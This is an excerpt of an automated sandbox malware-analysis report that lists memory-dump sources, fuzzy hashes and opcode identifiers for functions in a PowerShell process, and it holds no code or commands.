                                                                                                      • Source File: 00000000.00000002.2196534896.00007FF849110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849110000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff849110000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2f0c104beae7e75cc8f3ae880d3a4372c6d86b766d8ebf803dd85da98473b6c1
                                                                                                      • Instruction ID: 741401b7fb252bc8f593245b7c6333724d3128e694f26ab1ab6668a94e43cbc3
                                                                                                      • Opcode Fuzzy Hash: 2f0c104beae7e75cc8f3ae880d3a4372c6d86b766d8ebf803dd85da98473b6c1
                                                                                                      • Instruction Fuzzy Hash: C7F09032A0C5858FEB55AB18A4819A8B7E0EF05360B1500F6D06DC7063EA2AAC508B50

                                                                                                      Non-executed Functions

                                                                                                      Function 00007FF848E6CA31 Relevance: 2.2, Strings: 1, Instructions: 908COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2193027592.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: I
                                                                                                      • API String ID: 0-3707901625
                                                                                                      • Opcode ID: e1c3921fb4ac62349e71704a53c8847c882e3be4db40f3704e1e6a348ed1f86a
                                                                                                      • Instruction ID: 0fc1af73bd408cd381b9996eb7642ec67d13068c6908f2b33b1f180dfb584334
                                                                                                      • Opcode Fuzzy Hash: e1c3921fb4ac62349e71704a53c8847c882e3be4db40f3704e1e6a348ed1f86a
                                                                                                      • Instruction Fuzzy Hash: 7C520532A0DAD64FE756EB2C98555E97FA0FF52394F5800B6C04CEB083DF29B8468794
                                                                                                      Function 00007FF848E70BFB Relevance: 2.1, Strings: 1, Instructions: 840COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2193027592.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: I
                                                                                                      • API String ID: 0-3707901625
                                                                                                      • Opcode ID: 7edae96486b573a9812ca154dba49558ccff75ff1d60012456ac20f8c5894b2c
                                                                                                      • Instruction ID: 4f8af7480bae75f119bcb4025bc5b15d2249c553da23299703f3e6e37985e91f
                                                                                                      • Opcode Fuzzy Hash: 7edae96486b573a9812ca154dba49558ccff75ff1d60012456ac20f8c5894b2c
                                                                                                      • Instruction Fuzzy Hash: 5942946690DBD25FE357AB786C650E53FA0FF537A5B0900FBD184CB0A3EA185C0A8365
                                                                                                      Function 00007FF848E684FD Relevance: 5.1, Strings: 4, Instructions: 70COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2193027592.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: N_^$N_^$N_^$N_^
                                                                                                      • API String ID: 0-3900292545
                                                                                                      • Opcode ID: 5cce2b6a3058e4e480e11fd19eadab8f3814c94e6f73f072fa8dc97af64999d4
                                                                                                      • Instruction ID: 1c00ba4253ae0f5c14ca5650501dd0588cf114807eca6f5a55c3c80bd340544f
                                                                                                      • Opcode Fuzzy Hash: 5cce2b6a3058e4e480e11fd19eadab8f3814c94e6f73f072fa8dc97af64999d4
                                                                                                      • Instruction Fuzzy Hash: 2521A7B2D0EAD38FE35AD72858990557FA0FF11398F6900FFC08D9A093FA7668078605